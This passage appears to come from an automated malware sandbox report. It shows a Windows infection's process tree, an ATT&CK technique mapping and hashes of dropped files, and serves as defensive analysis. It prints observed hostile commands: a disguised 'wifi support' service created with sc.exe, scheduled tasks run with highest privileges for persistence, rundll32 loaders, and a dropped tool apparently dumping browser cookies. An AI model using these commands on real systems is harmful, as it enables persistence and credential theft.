        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xe4,0xf0,0xec,0x110,0x114,0x7ff632ae5460,0x7ff632ae5470,0x7ff632ae5480
        7⤵
        
        PID:5340
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,16280625870913742014,5464305887497472525,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6408 /prefetch:8
        6⤵
        
        PID:1288
- C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
  "C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3624 -ip 3624
1⤵
PID:2588

C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_6.exe
sonia_6.exe
1⤵
- Executes dropped EXE
PID:1124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  PID:4716
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa4254f50,0x7ffaa4254f60,0x7ffaa4254f70
    3⤵
    PID:3516
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,18194576821712624020,10206930912281980413,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1784 /prefetch:8
    3⤵
    PID:5672
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1720,18194576821712624020,10206930912281980413,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1732 /prefetch:2
    3⤵
    PID:5624
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1720,18194576821712624020,10206930912281980413,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2340 /prefetch:8
    3⤵
    PID:5716
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1720,18194576821712624020,10206930912281980413,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:1
    3⤵
    PID:5844
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1720,18194576821712624020,10206930912281980413,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
    3⤵
    PID:5828
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1720,18194576821712624020,10206930912281980413,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1844 /prefetch:8
    3⤵
    PID:5812
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1720,18194576821712624020,10206930912281980413,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:8
    3⤵
    PID:2072
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,18194576821712624020,10206930912281980413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 /prefetch:8
    3⤵
    PID:1072
- C:\Users\Admin\Documents\84PcW6jIyYRauxFHR2YIdcei.exe
  "C:\Users\Admin\Documents\84PcW6jIyYRauxFHR2YIdcei.exe"
  2⤵
  PID:4472
- - C:\Users\Admin\AppData\Local\Temp\is-155PK.tmp\is-QUFF2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-155PK.tmp\is-QUFF2.tmp" /SL4 $10200 "C:\Users\Admin\Documents\84PcW6jIyYRauxFHR2YIdcei.exe" 1905553 52736
    3⤵
    PID:5404
  - - C:\Program Files (x86)\gjSearcher\gjsearcher79.exe
      "C:\Program Files (x86)\gjSearcher\gjsearcher79.exe"
      4⤵
      PID:4824
    - - C:\Users\Admin\AppData\Roaming\{d6dc608d-2a27-11ed-a0e3-806e6f6e6963}\ybdLuLUM3Akz.exe
        
        5⤵
        
        PID:5880
- C:\Users\Admin\Documents\z1iEIx4zP52rdqg918_8XDNM.exe
  "C:\Users\Admin\Documents\z1iEIx4zP52rdqg918_8XDNM.exe"
  2⤵
  PID:2212
- - C:\Users\Admin\AppData\Local\Temp\50c1695437\rovwer.exe
    "C:\Users\Admin\AppData\Local\Temp\50c1695437\rovwer.exe"
    3⤵
    PID:5740
- C:\Users\Admin\Documents\g8Ey_qcLAMzsutzobstfxgaZ.exe
  "C:\Users\Admin\Documents\g8Ey_qcLAMzsutzobstfxgaZ.exe"
  2⤵
  PID:5180
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mqznffoj\
    3⤵
    PID:6096
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gsbpokty.exe" C:\Windows\SysWOW64\mqznffoj\
    3⤵
    PID:5800
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" create mqznffoj binPath= "C:\Windows\SysWOW64\mqznffoj\gsbpokty.exe /d\"C:\Users\Admin\Documents\g8Ey_qcLAMzsutzobstfxgaZ.exe\"" type= own start= auto DisplayName= "wifi support"
    3⤵
    - Launches sc.exe
    PID:5664
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" description mqznffoj "wifi internet conection"
    3⤵
    - Launches sc.exe
    PID:3112
- C:\Users\Admin\Documents\7jMsDm5nHwrDMg1walDP3Pjp.exe
  "C:\Users\Admin\Documents\7jMsDm5nHwrDMg1walDP3Pjp.exe"
  2⤵
  PID:5148
- - C:\Windows\SysWOW64\control.exe
    "C:\Windows\System32\control.exe" .\CnO1e6XZ.j
    3⤵
    PID:5660
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\CnO1e6XZ.j
      4⤵
      PID:4564
- C:\Users\Admin\Documents\Lgf4ta6l9MrksSdxwLvQoyoM.exe
  "C:\Users\Admin\Documents\Lgf4ta6l9MrksSdxwLvQoyoM.exe"
  2⤵
  PID:5440
- C:\Users\Admin\Documents\xFUq8D9bVGqtHgoT3Xu8Zq3R.exe
  "C:\Users\Admin\Documents\xFUq8D9bVGqtHgoT3Xu8Zq3R.exe"
  2⤵
  PID:5336
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5208
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:2356
- C:\Users\Admin\Documents\LOo0u7Z0c6N6FO_VNXD09XNs.exe
  "C:\Users\Admin\Documents\LOo0u7Z0c6N6FO_VNXD09XNs.exe"
  2⤵
  PID:5168
- C:\Users\Admin\Documents\U6AjhRNBUVZC9jKfZfxLjo4T.exe
  "C:\Users\Admin\Documents\U6AjhRNBUVZC9jKfZfxLjo4T.exe"
  2⤵
  PID:5512
- - C:\Users\Admin\Documents\U6AjhRNBUVZC9jKfZfxLjo4T.exe
    "C:\Users\Admin\Documents\U6AjhRNBUVZC9jKfZfxLjo4T.exe" -q
    3⤵
    PID:5808
- C:\Users\Admin\Documents\eUHMBKLmMgOoxfMmBowDt7b1.exe
  "C:\Users\Admin\Documents\eUHMBKLmMgOoxfMmBowDt7b1.exe"
  2⤵
  PID:5952
- C:\Users\Admin\Documents\bsy9aZs0O2khYH8IvBOlKyOz.exe
  "C:\Users\Admin\Documents\bsy9aZs0O2khYH8IvBOlKyOz.exe"
  2⤵
  PID:1600

C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_7.exe
sonia_7.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3080
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  - Executes dropped EXE
  PID:2736
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2872

C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_4.exe
sonia_4.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:2340
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  - Loads dropped DLL
  PID:3164
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 600
    3⤵
    - Program crash
    PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3164 -ip 3164
1⤵
PID:656

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1380

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS44D9.tmp\Install.cmd

Filesize
51B

MD5
bd2797de138774d2071bafadb59fde7b

SHA1
6c95d88e9b0b0ec4f0c5764ced06c80b56776efa

SHA256
c1cfd194b2fdcfa26f414747056ef58235be0f8420a9990124dc03100f88308d

SHA512
d7221d022cccc4348dedda4219f3f6fd44fe99558ff0aced089ae0b146e33cb13833002caf20e0bce6996c2bbaf6a4c7f7f4f7aa8d05a16d5b776d361c76bf75

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libcurl.dll

Filesize
218KB

MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libcurl.dll

Filesize
218KB

MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libcurl.dll

Filesize
218KB

MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libcurlpp.dll

Filesize
54KB

MD5
e6e578373c2e416289a8da55f1dc5e8e

SHA1
b601a229b66ec3d19c2369b36216c6f6eb1c063e

SHA256
43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

SHA512
9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libcurlpp.dll

Filesize
54KB

MD5
e6e578373c2e416289a8da55f1dc5e8e

SHA1
b601a229b66ec3d19c2369b36216c6f6eb1c063e

SHA256
43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

SHA512
9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libgcc_s_dw2-1.dll

Filesize
113KB

MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libgcc_s_dw2-1.dll

Filesize
113KB

MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libgcc_s_dw2-1.dll

Filesize
113KB

MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libstdc++-6.dll

Filesize
647KB

MD5
5e279950775baae5fea04d2cc4526bcc

SHA1
8aef1e10031c3629512c43dd8b0b5d9060878453

SHA256
97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

SHA512
666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libstdc++-6.dll

Filesize
647KB

MD5
5e279950775baae5fea04d2cc4526bcc

SHA1
8aef1e10031c3629512c43dd8b0b5d9060878453

SHA256
97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

SHA512
666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libwinpthread-1.dll

Filesize
69KB

MD5
1e0d62c34ff2e649ebc5c372065732ee

SHA1
fcfaa36ba456159b26140a43e80fbd7e9d9af2de

SHA256
509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

SHA512
3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\libwinpthread-1.dll

Filesize
69KB

MD5
1e0d62c34ff2e649ebc5c372065732ee

SHA1
fcfaa36ba456159b26140a43e80fbd7e9d9af2de

SHA256
509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

SHA512
3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\setup_install.exe

Filesize
290KB

MD5
b1b08befa4d0b60d8cf636ef7fa77779

SHA1
45c2bbd6af057098d1d1e4c925daa7c353ed024c

SHA256
08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a

SHA512
e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\setup_install.exe

Filesize
290KB

MD5
b1b08befa4d0b60d8cf636ef7fa77779

SHA1
45c2bbd6af057098d1d1e4c925daa7c353ed024c

SHA256
08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a

SHA512
e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_1.exe

Filesize
712KB

MD5
6e43430011784cff369ea5a5ae4b000f

SHA1
5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

SHA256
a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

SHA512
33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_1.exe

Filesize
712KB

MD5
6e43430011784cff369ea5a5ae4b000f

SHA1
5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

SHA256
a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

SHA512
33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_1.txt

Filesize
712KB

MD5
6e43430011784cff369ea5a5ae4b000f

SHA1
5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

SHA256
a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

SHA512
33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_2.exe

Filesize
150KB

MD5
9f569d0eae949d683725de7bbe893eb8

SHA1
e4696b870a5a9d06585df259e8ee80f4b2364823

SHA256
273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a

SHA512
94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_2.txt

Filesize
150KB

MD5
9f569d0eae949d683725de7bbe893eb8

SHA1
e4696b870a5a9d06585df259e8ee80f4b2364823

SHA256
273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a

SHA512
94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_3.exe

Filesize
516KB

MD5
7c42c04a6e95c6b494018be20ef811dc

SHA1
126d1bce056ae6ba2cea63815f6465450a1a6339

SHA256
f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69

SHA512
2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_3.txt

Filesize
516KB

MD5
7c42c04a6e95c6b494018be20ef811dc

SHA1
126d1bce056ae6ba2cea63815f6465450a1a6339

SHA256
f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69

SHA512
2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_4.exe

Filesize
8KB

MD5
aebba1a56e0d716d2e4b6676888084c8

SHA1
fb0fc0de54c2f740deb8323272ff0180e4b89d99

SHA256
6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b

SHA512
914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_4.txt

Filesize
8KB

MD5
aebba1a56e0d716d2e4b6676888084c8

SHA1
fb0fc0de54c2f740deb8323272ff0180e4b89d99

SHA256
6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b

SHA512
914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_5.exe

Filesize
213KB

MD5
f9de3cedf6902c9b1d4794c8af41663e

SHA1
0439964dbcfa9ecd68b0f10557018098dcb6d126

SHA256
ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338

SHA512
aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_5.txt

Filesize
213KB

MD5
f9de3cedf6902c9b1d4794c8af41663e

SHA1
0439964dbcfa9ecd68b0f10557018098dcb6d126

SHA256
ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338

SHA512
aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_6.exe

Filesize
1014KB

MD5
0c3f670f496ffcf516fe77d2a161a6ee

SHA1
0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

SHA256
8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

SHA512
bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_6.txt

Filesize
1014KB

MD5
0c3f670f496ffcf516fe77d2a161a6ee

SHA1
0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

SHA256
8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

SHA512
bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_7.exe

Filesize
967KB

MD5
2eb68e495e4eb18c86a443b2754bbab2

SHA1
82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

SHA256
a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

SHA512
f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_7.txt

Filesize
967KB

MD5
2eb68e495e4eb18c86a443b2754bbab2

SHA1
82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

SHA256
a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

SHA512
f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_8.exe

Filesize
816KB

MD5
c04d390489ac28e849ca9159224822af

SHA1
5b0c9e7b4a95d4729e62d106dbf89cb72919e64a

SHA256
d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df

SHA512
25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8D1F4347\sonia_8.txt

Filesize
816KB

MD5
c04d390489ac28e849ca9159224822af

SHA1
5b0c9e7b4a95d4729e62d106dbf89cb72919e64a

SHA256
d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df

SHA512
25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

Download Submit
C:\Users\Admin\AppData\Local\Temp\CC4F.tmp

Filesize
1.6MB

MD5
4f3387277ccbd6d1f21ac5c07fe4ca68

SHA1
e16506f662dc92023bf82def1d621497c8ab5890

SHA256
767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac

SHA512
9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

Filesize
42KB

MD5
1eba952dd3974898cd98fbc8807b6929

SHA1
963289ab1f6af6b34fc596bb0464947e230db350

SHA256
6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315

SHA512
18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

Filesize
42KB

MD5
1eba952dd3974898cd98fbc8807b6929

